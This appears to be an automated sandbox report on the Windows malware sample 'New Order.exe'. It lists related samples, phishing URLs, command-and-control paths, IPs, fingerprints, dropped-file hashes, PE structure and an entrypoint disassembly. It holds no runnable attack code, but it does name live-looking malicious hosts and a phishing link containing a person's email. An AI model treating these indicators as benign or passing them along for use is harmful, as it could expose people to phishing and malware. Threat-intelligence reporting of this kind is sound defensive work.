	https://octagon-harpsi8776ds9f9chord-8gze.net/	Get hash	malicious	HTMLPhisher	Browse
	http://fluttercomman.com/	Get hash	malicious	Unknown	Browse
	https://t.sidekickopen86.com/s3t/c/5/f18dQhb0V1-gmb8c7SZ_W1x1Wk359hl3kW7_k2841CX6NGW36Q28R1D8_RCVv6xCD11t9-sf197v5Y04?te=W3R5hFj4cm2zwW3Kb3pK1T_bFpW3M1YQr41TRgPW45TRgW3K2B2XW43Tw8Z4hMntNW43SfLS43T4N9W4hLywB3R5hFjW4cbjZB1mp7wVW1SbD6w4fG967W3T3qd41GF81sW4cKgQM3K7-PpW41Yswk43T3VxW2zpLjf43j6YSW1mp7y51mp7ygW3K8R4L41PFX7W1SbFxy3K3p__W3_QfJp3_X5XxW3SYLpP3T1MdGW49HRqW4cFxKwW3_m1SR2xZ8D8W43WhFN45vScwW4fykN22FY-vmW4rzN743g0nzVW3XFZV13K5WpgW4fD5rY2vLKG4W3_JkBy2zWlrXW2vMsC9327xbYW3zdyqG3H3bCkW2dLp8t2120KSW1mrcDQ2125hqW1N5bQ43JKGc-W3H4lnW3GJ6mnW1Y_53P3H3wh3W1N4mzM25fdWBW2s-jZn3DKzB-W21j9B33JH_83W1Z0NBt3H35pLW3BLCyh1Qsz5DW24MF5S1M_KB9W1M_KB91-YRkwW1X2dfL1X1P_vW1V1BHr1V0kbLW2sT8Np41WvysW1mrcFH3bbSV-W2CPrBR1VpB4NW4rk2JQ3W0hhLW2sCrVK3VG8J7W2vHnkK2sNx_mW3W0hhW1SvsLmW4thcjM2sNwHsW3SLSgN3Xw1hwW3bBdxd2sNyCPW2sN47Q41q7qZW2vsFFV1M_KB9W1mrcDQ211_TkW3_Ygfy3H3bCkW2f1gbs3jvpvFW41K4dB3XDCd4W254cSg25fkyKW2KD0x51Sby4tW3W3_m71S8SN8W2zvP9l45WvP3W3QNggB2vt6RpW45rYrc4cJ2Vxf3K2WHM04&si=8000000026898251&pi=0b755dfe-788c-4ae6-a229-0f4bcd270698	Get hash	malicious	HTMLPhisher	Browse
188.114.96.3	LisectAVT_2403002B_448.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.universitetrading.com/hfhf/?6lBX5p6=0/2bsV2tZWehMRII3oIkv/ztWj8eLfm1RPHJ5DhA9wGKWMCN0u1aqYIHkCdH1AqUUdYe&Kjsl=FbuD_t_HwtJdin
	LisectAVT_2403002B_89.exe	Get hash	malicious	CobaltStrike	Browse	cccc.yiuyiu.xyz/config.ini
	54.xls	Get hash	malicious	FormBook	Browse	tny.wtf/
	Order_490104.xls	Get hash	malicious	Unknown	Browse	tny.wtf/vb
	Order_490104.xls	Get hash	malicious	Unknown	Browse	tny.wtf/vb
	Scan copy.xls	Get hash	malicious	Unknown	Browse	tny.wtf/3VC
	Order_490104.xls	Get hash	malicious	Unknown	Browse	tny.wtf/vb
	SEL1685129 AMANOS.pdf.exe	Get hash	malicious	Azorult, GuLoader	Browse	bshd1.shop/OP341/index.php
	S0042328241130.xls	Get hash	malicious	Remcos	Browse	tny.wtf/v0na
	ESPLS-RFQ_2400282.exe	Get hash	malicious	Azorult, GuLoader	Browse	crst2.shop/HM341/index.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	Payment_Advice.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	LPO-9180155-PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Payment Slip.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Torpernes.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Confirmation Order.js	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	DSD876543456780000.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Deye Union - PO # 23081377.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	rPO0977-6745.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	z1QuotationSheetVSAA6656776.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.67.177.134
checkip.dyndns.com	Payment_Advice.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	LPO-9180155-PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	Payment Slip.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	Torpernes.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	Confirmation Order.js	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	DSD876543456780000.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Confirmation transfer Note AGS # 22-00379.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	Deye Union - PO # 23081377.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	rPO0977-6745.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
api.telegram.org	LisectAVT_2403002B_4.exe	Get hash	malicious	AsyncRAT, Neshta, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	Payment_Advice.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Payment Slip.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Torpernes.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Lisect_AVT_24003_G1B_119.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Lisect_AVT_24003_G1B_119.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Lisect_AVT_24003_G1B_33.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	DSD876543456780000.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Install.msi	Get hash	malicious	Unknown	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	LisectAVT_2403002B_181.exe	Get hash	malicious	PrivateLoader	Browse	149.154.167.99
	LisectAVT_2403002B_272.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	149.154.167.99
	LisectAVT_2403002B_344.exe	Get hash	malicious	Bdaejec, Vidar	Browse	149.154.167.99
	LisectAVT_2403002B_4.exe	Get hash	malicious	AsyncRAT, Neshta, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	Payment_Advice.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Payment Slip.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Torpernes.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Bootstrapper.exe	Get hash	malicious	Hancitor, Vidar	Browse	149.154.167.99
	LisectAVT_2403002C_60.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	149.154.167.99
AARNET-AS-APAustralianAcademicandResearchNetworkAARNe	LisectAVT_2403002B_137.dll	Get hash	malicious	Trickbot	Browse	134.150.60.75
	LisectAVT_2403002B_164.exe	Get hash	malicious	UACMe	Browse	103.165.81.207
	Quotation .exe	Get hash	malicious	Remcos, DBatLoader	Browse	103.186.116.62
	Request Quotation.exe	Get hash	malicious	Remcos, DBatLoader	Browse	103.186.117.150
	https://sidbm.net/officialweb/?russell.sinco@corespecialty.com	Get hash	malicious	HTMLPhisher	Browse	103.177.95.90
	Request for quotation.exe	Get hash	malicious	Remcos, DBatLoader	Browse	103.186.117.150
	OCcyyxs6dW.elf	Get hash	malicious	Unknown	Browse	138.44.174.224
	#U00d6deme kopyas#U0131.xls	Get hash	malicious	Remcos	Browse	103.186.116.99
	SLL8zVmaGj.elf	Get hash	malicious	Unknown	Browse	103.185.53.151
	jBOlW3hwun.elf	Get hash	malicious	Mirai	Browse	103.128.54.5
CLOUDFLARENETUS	https://afhsir.zendesk.com/attachments/token/COhP3mnSdhYhm5qS1XogKCGVf/?name=Sync_Approval_Document.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	LisectAVT_2403002B_14.dll	Get hash	malicious	Unknown	Browse	162.159.36.2
	https://afhsir.zendesk.com/attachments/token/COhP3mnSdhYhm5qS1XogKCGVf/?name=Sync_Approval_Document.html	Get hash	malicious	HTMLPhisher	Browse	104.18.173.234
	SWIFT COPY.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Setup 3.0.0.msi	Get hash	malicious	Unknown	Browse	162.159.135.232
	https://notifications.google.com/g/p/ANiao5pINdT9lhgDCXkUgHdVT2B-ifrviK28tcLeml1dKiUt1vyhR8-9HwTB5zfcatXzPi7dPCsOm3yrKpsUmGyowGKSyLzV61dTTKZlAfiMhmwNFlCekkaYgwDgGxISCQjPztiW4jxuMFDoe03C_cAjdup6ZClhfusVn6MOrQKITHW7UJoxJIox4EDWHvMQK-8R_wt8iGwrzHU6AJ3TylxIydZs8g0xIPAYStVB	Get hash	malicious	Unknown	Browse	1.1.1.1
	http://ahp410.acemlnb.com	Get hash	malicious	HTMLPhisher	Browse	104.16.51.111
	LisectAVT_2403002B_162.exe	Get hash	malicious	CobaltStrike	Browse	104.21.28.227
	https://budget.us.avgcustomerservice.com/login	Get hash	malicious	Unknown	Browse	104.17.25.14
	LisectAVT_2403002B_162.exe	Get hash	malicious	CobaltStrike	Browse	104.21.28.227
ORACLE-BMC-31898US	Payment_Advice.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	Payment Slip.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	Torpernes.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	Lisect_AVT_24003_G1B_67.exe	Get hash	malicious	Unknown	Browse	158.101.28.51
	DSD876543456780000.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	Confirmation transfer Note AGS # 22-00379.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	counter.exe	Get hash	malicious	Bdaejec	Browse	158.101.87.161
	rPO0977-6745.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	z1QuotationSheetVSAA6656776.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	LisectAVT_2403002B_361.exe	Get hash	malicious	Quasar	Browse	188.114.96.3
	SWIFT.exe	Get hash	malicious	Lokibot	Browse	188.114.96.3
	Payment_Advice.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	LPO-9180155-PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Apixaban - August 2024.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Payment Slip.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Torpernes.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Confirmation Order.js	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Lisect_AVT_24003_G1B_21.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	Lisect_AVT_24003_G1B_21.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
3b5074b1b5d032e5620f69f9f700ff0e	LisectAVT_2403002B_132.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	LisectAVT_2403002B_14.dll	Get hash	malicious	Unknown	Browse	149.154.167.220
	LisectAVT_2403002B_132.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	LisectAVT_2403002B_143.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	SWIFT COPY.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	LisectAVT_2403002B_143.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	LisectAVT_2403002B_161.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	LisectAVT_2403002B_161.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	LisectAVT_2403002B_202.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	LisectAVT_2403002B_202.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\New Order.exe
File Type:	data
Category:	dropped
Size (bytes):	244224
Entropy (8bit):	7.889182384615214
Encrypted:	false
SSDEEP:	6144:5ZaP1hwN3nZfRtx/3N/LrNvPhwtO66Ol2UlhEbLwltcY:z5npRq6aVZ
MD5:	C188BA967FB0318F9E3EFB10163414CB
SHA1:	4BDA763B26A8BD8403BDACDACB259F94AA5AC7DE
SHA-256:	93EC3EA339151FC650C7E00954B4220B631454B586CCA90491446ED08143FE29
SHA-512:	778E7C14BB5FCC2756DDD7F5EFFD96710B55B147DA5BD7FE336981D0E05A0D25D7193A0FA537BE84776ED25080A0D07A6FD7F0C86F8EEF58C69383488C345DA1
Malicious:	false
Reputation:	low
Preview:	...N10BEP8Y1..39.KIFYCS9.20BET8Y1P839RKIFYCS9N20BET8Y1P839RK.FYC]&.<0.L...0...m:":f)1<^<S]b&5V7^$.Q\r9<(y=..}cb(;\<.]59.RKIFYCSQ^..n4.Fu@.F.H.5{e&=lH.L;...(...B.,.8.'qpW0.A.;f.0O.I.G`h28t2.G.[S*i%.'1P839RKIFYCS9N20...^Y1P8c\|RK.G]C'.Nb0BET8Y1P.3.S@HOYC.8N2.@ET8Y1..39R[IFY.R9N2pBED8Y1R83<RKIFYCS<N20BET8Y1T83=RK.}[CQ9N.0BUT8I1P83)RKYFYCS9N"0BET8Y1P839.^KF.CS9NR2B..9Y1P839RKIFYCS9N20BET8Y1P8.SKUFYCS9N20BET8Y1P839RKIFYCS9N.=@E.8Y1P839RKIFY.R9.30BET8Y1P839RKIFYCS9N20BET8wE5@G9RKQ.XCS)N20.DT8]1P839RKIFYCS9N.0B%zJ=P$Y39.&IFY.R9N\0BE.9Y1P839RKIFYCSyN2pl!5L81P8..RKIf[CS/N20HGT8Y1P839RKIFY.S9..B1778Y1.29R+KFY.R9N.2BET8Y1P839RKI.YC.9N20BET8Y1P839RKIFYCS9N20BET8Y1P839RKIFYCS9N20BET8Y1P839RKIFYCS9N20BET8Y1P839RKIFYCS9N20BET8Y1P839RKIFYCS9N20BET8Y1P839RKIFYCS9N20BET8Y1P839RKIFYCS9N20BET8Y1P839RKIFYCS9N20BET8Y1P839RKIFYCS9N20BET8Y1P839RKIFYCS9N20BET8Y1P839RKIFYCS9N20BET8Y1P839RKIFYCS9N20BET8Y1P839RKIFYCS9N20BET8Y1P839RKIFYCS9N20BET8Y1P839RKIFYCS9N20BET8Y1P839RKIFYCS9N20BET8Y1P839RKIFYCS9N20BET8Y1P

C:\Users\user\AppData\Local\Temp\ageless

Download File

Process:	C:\Users\user\Desktop\New Order.exe
File Type:	ASCII text, with very long lines (28674), with no line terminators
Category:	dropped
Size (bytes):	28674
Entropy (8bit):	3.582963579931739
Encrypted:	false
SSDEEP:	768:JxBr6ScFCo3T3iC+vt63YntRUu+nZ+nskm/Bsl2HzpmL5sCWi:Zr6ScFCo3T3i3vt63YntRUu+nZ+nskmq
MD5:	BCE3B844059ED89A5DAABD0891345A1A
SHA1:	23328AE7907B9B1DCCBB0386CD5462D5D7EF5663
SHA-256:	61CAAA20EADE563044D88D18937D663E86EC196D85D91031409304B3C76E4178
SHA-512:	4332B4B09C6CEBA59CC0A8A4E757D4D4E2B4A855C06D4EDE7D4BE29391682AE8FD7E6063DA21E4C0CF7F5E6C60ABA9321590D100728B2191DACA9C491992CA4F
Malicious:	false
Reputation:	low
Preview:	3{88;ehf;4hfff353333898:e;9e33333399;<78;7e<9833333399;<7g;9ed:533333399;<88;;e;9h33333399;<78;de<9833333399;<7g;fed9f33333399;<88;he;6633333399;<78<3e<6533333399;<7g<5ed5h33333399;<88<7e;9733333399;<78<9e<9f33333399;<7g<;ed9f33333399;<88<d66f399;<78<fe<9h33333399;<;g77iiiiiied:733333399;<<879iiiiiie;9733333399;<;87;iiiiiie<9f33333399;<;g7diiiiiied9f33333399;<<87fiiiiiie;5h33333399;<;87hiiiiiie<9733333399;<;g83iiiiiied9f33333399;<<885iiiiiie;9f33333399;<;887iiiiii66f<99;<;g89iiiiiied:833333399;<88g3e;:633333399;<78g5e<9833333399;<7gg7ed:533333399;<88g9e;6633333399;<78g;e<6533333399;<7ggded5h33333399;<88gfe;9733333399;<78ghe<9f33333399;<7gh3ed9f33333399;<88h566f399;<78h7e<9433333399;<;g9;iiiiiied9733333399;<<89diiiiiie;:933333399;<;89fiiiiiie<9433333399;<;g9hiiiiiied:333333399;<<8:3iiiiiie;9<33333399;<;8:5iiiiiie<6633333399;<;g:7iiiiiied6533333399;<<8:9iiiiiie;5h33333399;<;8:;iiiiiie<9733333399;<;g:diiiiiied9f33333399;<<8:fiiiiiie;9f33333399;<;8:hiiiiii66f<99;<7g;3ed:633333399;<88d3e;9;

C:\Users\user\AppData\Local\Temp\autC751.tmp

Download File

Process:	C:\Users\user\Desktop\New Order.exe
File Type:	data
Category:	dropped
Size (bytes):	243338
Entropy (8bit):	7.976209961193039
Encrypted:	false
SSDEEP:	3072:fY9HDeHcs0KuAG+4MqOvJbWqE5ulc+udT0Lu4VeES3l+H56z5fXi1JqI26lJ0EAG:fkerurfMqHqEki+Q0YEVupI2WJ
MD5:	C637043C4FF2508624D6A6670A5F98B2
SHA1:	34E57F42135376D73096D9C7E38DEC987A6D2875
SHA-256:	A968965D384A62947DE31E441D706FBA7E8A582240CF8644513AE2D037918D3F
SHA-512:	D361DFD921B64C9A901DA0355C1CD6F2F967690E3FCC640BFF605B900525E7E0EC1B930F355F054439C56CE6077CB79F9733CC06D26BF1F277F9CDB9E09247BC
Malicious:	false
Reputation:	low
Preview:	EA06.....Bu4..E.N+3...g9.R.4j...9.L..J...P.L.5 .\..~.H..].}'...33...#.X..u".Y.3..zyS...Z..$.Tk.)..Qy.Oc0...(..'....s..T.F......5...G......&..).Jd...D...tR..E...=..W.K.:..70...=.=..2.]&[.<r.S.Zd.)8.G....+.....R..h....9N..^.3.T...}f..S.R.............R.?..-..T.N&s..L..?7T.L.^..[..g4..U.N) ...K..?bD.M.5z.F....)......}.<EN.U.e.......(.@._.T....'.w..h.p.R..P.r..S.D.N+.._.JaB..S....PI.?3\.?9......D.Hf....C...,..N^..R(......9.G(S....T.h&S....F..@........Vhq0....W..F...+.6.>.q}..-?.3....Y...I.L.P>5ne...s.L..9...s.\|.++..K)X+.....T..~.I..b{.~...b@..../=.b....I...hT..'M>.~&....F........E&......e-.j5g..A.....Wx.a.3..?%H....:..o5.S.>.._.P.u..&...k..M..Y.i......V.h....7.J.......l:..\..I...........,P[u.i..h.......],.Z./i..G$....F...DHO"{n..[..6.u..j...6.x&y.6.s..T'.:.j...Vw..42....1...Z.8..r..mV.:.].......Z...w.....4.Q..M....S..E.Up..C.u..~..sp..h.n5.;r.r...=..A.p...%.....5...........W.[.=.............c.............p.l'Qi......f=......Rw:m.Ca..I).>lb

C:\Users\user\AppData\Local\Temp\autC7A0.tmp

Download File

Process:	C:\Users\user\Desktop\New Order.exe
File Type:	data
Category:	dropped
Size (bytes):	9772
Entropy (8bit):	7.637196078177027
Encrypted:	false
SSDEEP:	192:Z6E+bT+X/8ER7PVz6sNiDrFdZMecXWHLN9q5pcL2uopS18d9Nu:Z6dwXRhNiHBN9q5iRi4
MD5:	9023416B42959F17A7EFDE344B6C6770
SHA1:	AA13B61FFA87BAF7E9A94C59CB95107E8F9BA2E4
SHA-256:	AE209E9431FCFC47236F745503DCFFBC8C127BE44E0F438FCC97D78A5827EBB3
SHA-512:	0DEC359B57CA17D050156BA9FF57AC35C040F1A8780A6A078FB91167A1EEF056708821B59CD71AD2FF0FD104D35CD56D588F2F67A0AE11745EDA367F3DD44845
Malicious:	false
Reputation:	low
Preview:	EA06..p........f..-.k5.g5.......ue..l....g9...y..oe.Ng..]....I...K........\|.@.o..e.Nl......;.M...<..g.`........5.Z..q<..6.p.o.r..Y......g.<.M..`..Y....N...y.........<.M. ...r.'s....c ....Ad.H.....0.F.3<..Z..6...<.f....&....x..p....Bx.....Y'@0.N,.;,.t...Y.5_..n..... 5_..v.U...5_....U....5_..f.U..&.5\..>3@..N@^.d.Z..q9.z..u9......@.........G.@/Z..g......jx....t.u....$.../.u;...g@G_T.......>_.......zq8..........P..................`.M..`... ...f...@..@.'.7..@{>K,..c..,.p..Yg ._..v....A.>K(#G.e..3\|vi..G.7...8_..qf..i\|vi....f.h.,.@......5..:..-3{M....6`;..;..'.`.L..6...f..+0.ff.Y...9.......f.`.E...Y....3.y............vy.....`.....2p....<d....,vh...$......!+0.'&.....,fu5.Y..Y......r.5.X...c3.<.ki.Y.!...Gf.....,f.<.N. . .#:.....c.`........v.h.s.....,vl...,..t......40.....f.........4..@.6.-..p..S.E..5...S`.N...;8.`..<.......q;.....c....Z&..wx.....vr........E......y6....p.c3.=..7..b.!....F ...B5f...........vt......fvk=.x...B3......;;.X...d....8........g`...Mg..D..f...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.118207994205288
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	New Order.exe
File size:	1'234'944 bytes
MD5:	6610a5896fe0895ed5ca90f938906372
SHA1:	b31f809206ea7352a8e2707bece1b087ded10ab1
SHA256:	31c28bce87bf83996ccbd1e7bea5de7a75b5f840df1e108f6792d5b17185da66
SHA512:	4528dd35d5d2e37c0e3597ac02e07f420e3671d6336bef00870d101ab50348556a4eb796bc1b462a8c5f22393917c0c958ce37323e2ec8ff75398696f5e2830b
SSDEEP:	24576:KqDEvCTbMWu7rQYlBQcBiT6rprG8aPUJOy2AwxelFby:KTvC/MTQYxsWR7aPby2Txeb
TLSH:	1A45CF027391C062FF9B92334B5AF6115BBD79260123EA1F13A81D7ABD701B1563E7A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A240C8 [Thu Jul 25 12:10:48 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007FD400BE6C23h
jmp 00007FD400BE652Fh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FD400BE670Dh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FD400BE66DAh
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007FD400BE92CDh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007FD400BE9318h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007FD400BE9301h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e64	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0x56cc0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x12b000	0x7594	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb0ff0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3400	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1010	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9ab1d	0x9ac00	0a1473f3064dcbc32ef93c5c8a90f3a6	False	0.565500681542811	data	6.668273581389308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb82	0x2fc00	c9cf2468b60bf4f80f136ed54b3989fb	False	0.35289185209424084	data	5.691811547483722	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x706c	0x4800	53b9025d545d65e23295e30afdbd16d9	False	0.04356553819444445	DOS executable (block device driver @\273\)	0.5846666986982398	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0x56cc0	0x56e00	391d98f60f40ef7164524822d73b2fbe	False	0.924173785971223	data	7.886327980311716	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x12b000	0x7594	0x7600	c68ee8931a32d45eb82dc450ee40efc3	False	0.7628111758474576	data	6.7972128181359786	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xd46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xd47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xd4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xd4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xd5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xd6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xd69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xd8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xda038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xda4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xda4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xdaa84	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xdb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdbb9c	0x65c	data	English	Great Britain	0.34336609336609336
